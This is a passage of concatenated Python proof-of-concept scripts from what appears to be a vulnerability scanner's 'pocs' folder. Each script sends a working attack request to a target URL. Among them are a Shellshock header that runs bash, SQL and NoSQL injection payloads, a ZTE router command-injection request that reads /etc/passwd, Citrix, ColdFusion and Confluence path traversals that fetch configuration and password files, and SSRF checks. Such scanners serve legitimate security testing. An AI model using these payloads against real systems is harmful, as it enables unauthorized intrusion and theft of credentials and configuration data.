5 | if baseurl[-1]=="/":
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"InsightPluginShowGeneralConfiguration.jspa;"
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and "General Insight Configuration" in response.text:
13 | r1=True
14 | else:
15 | r1=False
16 | if r1:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-bash-cve-2014-6271.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
3 | def randomInt(s,e):
4 | import random
5 | key=random.randint(int(s),int(e))
6 | return key
7 | r1=randomInt(800000000, 1000000000)
8 | def randomInt(s,e):
9 | import random
10 | key=random.randint(int(s),int(e))
11 | return key
12 | r2=randomInt(800000000, 1000000000)
13 | def scan(baseurl):
14 | if baseurl[-1]=='/':
15 | baseurl=baseurl
16 | else:
17 | baseurl=baseurl+"/"
18 | url=baseurl+"cgi-bin/victim.cgi"
19 | headers={'User-Agent': "() { :; }; echo; echo; /bin/bash -c \'expr "+str(r1)+" + "+str(r2)+"\'"}
20 | response=requests.get(url,headers=headers,timeout=5,verify=False)
21 | if str(r1 + r2) in response.text:
22 | r0=True
23 | else:
24 | r0=False
25 | if r0:
26 | return True
27 | else:
28 | return False
29 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-bt742-pma-unauthorized-access.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=='/':
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"pma/"
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and "information_schema" in response.text and "phpMyAdmin" in response.text and "server_sql.php" in response.text:
13 | r0=True
14 | else:
15 | r0=False
16 | if r0:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-cerebro-request-ssrf.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=="/":
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"rest/request"
10 | body='{"method":"GET","data":"","path":"robots.txt","host":"https://www.baidu.com"}'
11 | headers={'content-type': 'application/json'}
12 | response=requests.post(url,body,headers=headers,timeout=5,verify=False)
13 | if "Disallow" in response.text and "baidu" in response.text and response.status_code == 200 and "Unrecognized token" in response.text and "{\"status\":500" in response.text:
14 | r1=True
15 | else:
16 | r1=False
17 | if r1:
18 | return True
19 | else:
20 | return False
21 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-changjie-crm-sqli.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | from hashlib import md5
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def randomInt(s,e):
5 | import random
6 | key=random.randint(int(s),int(e))
7 | return key
8 | a1=randomInt(200, 900)
9 | def scan(baseurl):
10 | if baseurl[-1]=="/":
11 | baseurl=baseurl
12 | else:
13 | baseurl=baseurl+"/"
14 | url=baseurl+"webservice/get_usedspace.php?site_id=-1159%20UNION%20ALL%20SELECT%20md5("+str(a1)+")--"
15 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
16 | response=requests.get(url,headers=headers,timeout=5,verify=False)
17 | if md5(str(a1).encode()).hexdigest() in response.text:
18 | r1=True
19 | else:
20 | r1=False
21 | if r1:
22 | return True
23 | else:
24 | return False
25 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-china-mobile-yu-router-information-disclosure.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=="/":
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"cgi-bin/ExportSettings.sh"
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and re.search("#The following line must not be removed.",response.text) and re.search("wan_pptp_user",response.text) and re.search("wan_pptp_pass",response.text):
13 | r0=True
14 | else:
15 | r0=False
16 | if r0:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-china-telecom-zte-f460-rce.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=="/":
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"web_shell_cmd.gch"
10 | body="IF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=cat+%2Fetc%2Fpasswd&CmdAck="
11 | headers={'Content-Type': 'application/x-www-form-urlencoded'}
12 | response=requests.post(url,body,headers=headers,timeout=5,verify=False)
13 | if response.status_code == 200 and re.search("root:.*:0",response.text):
14 | r0=True
15 | else:
16 | r0=False
17 | if r0:
18 | return True
19 | else:
20 | return False
21 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-citrix-cve-2019-19781-path-traversal.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=='/':
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"vpn/.%2e/vpns/cfg/smb.conf"
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and "encrypt passwords" in response.text and "name resolve order" in response.text:
13 | r0=True
14 | else:
15 | r0=False
16 | if r0:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-clickhouse-http-unauth.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 | from hashlib import md5
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def randomInt(s,e):
5 | import random
6 | key=random.randint(int(s),int(e))
7 | return key
8 | r=randomInt(800000000, 1000000000)
9 | def scan(baseurl):
10 | if baseurl[-1]=='/':
11 | baseurl=baseurl
12 | else:
13 | baseurl=baseurl+"/"
14 | url=baseurl+f"?query=select%20lower(hex(MD5('{r}')))"
15 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
16 | response=requests.get(url,headers=headers,timeout=5,verify=False)
17 | if response.status_code == 200 and md5(str(r).encode()).hexdigest() in response.text:
18 | r0=True
19 | else:
20 | r0=False
21 | if r0:
22 | return True
23 | else:
24 | return False
25 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-cmseasy-sqli.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=="/":
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"?case=crossall&act=execsql&sql=Nd2asYGSjJK2jNTg4MSA28UozMil7"
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and "{\"md5(31415926)\":\"e9982ec5ca981bd365603623cf4b2277\"}" in response.text:
13 | r0=True
14 | else:
15 | r0=False
16 | if r0:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-cockpit-cve-2020-35847-nosqli.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=="/":
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"auth/resetpassword"
10 | body='''{
11 | "token":{
12 | "$func":"var_dump"
13 | }
14 | }'''
15 | headers={'Content-Type': 'application/json'}
16 | response=requests.post(url,body,headers=headers,timeout=5,verify=False)
17 | if response.status_code == 200 and re.search("string[(]\\d+[)] \"rp-(.*?)\"",response.text):
18 | r0=True
19 | else:
20 | r0=False
21 | if r0:
22 | return True
23 | else:
24 | return False
25 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-coldfusion-cve-2010-2861-lfi.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=='/':
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and "rdspassword=" in response.text and "encrypted=" in response.text:
13 | r0=True
14 | else:
15 | r0=False
16 | if r0:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-confluence-cve-2015-8399.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=='/':
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"spaces/viewdefaultdecorator.action?decoratorName"
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and "confluence-init.properties" in response.text and "View Default Decorator" in response.text:
13 | r0=True
14 | else:
15 | r0=False
16 | if r0:
17 | return True
18 | else:
19 | return False
20 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-confluence-cve-2019-3396-lfi.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=='/':
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"rest/tinymce/1/macro/preview"
10 | body='{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"}}}'
11 | headers={'Content-Type': 'application/json', 'Referer': 'http://localhost'}
12 | response=requests.post(url,body,headers=headers,timeout=5,verify=False)
13 | if response.status_code == 200 and "contextConfigLocation" in response.text:
14 | r0=True
15 | else:
16 | r0=False
17 | if r0:
18 | return True
19 | else:
20 | return False
21 |
--------------------------------------------------------------------------------
/pocs/poc-yaml-coremail-cnvd-2019-16798.py:
--------------------------------------------------------------------------------
1 | import requests,re,urllib3
2 |
3 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
4 | def scan(baseurl):
5 | if baseurl[-1]=='/':
6 | baseurl=baseurl
7 | else:
8 | baseurl=baseurl+"/"
9 | url=baseurl+"mailsms/s?func=ADMIN:appState&dumpConfig=/"
10 | headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"}
11 | response=requests.get(url,headers=headers,timeout=5,verify=False)
12 | if response.status_code == 200 and "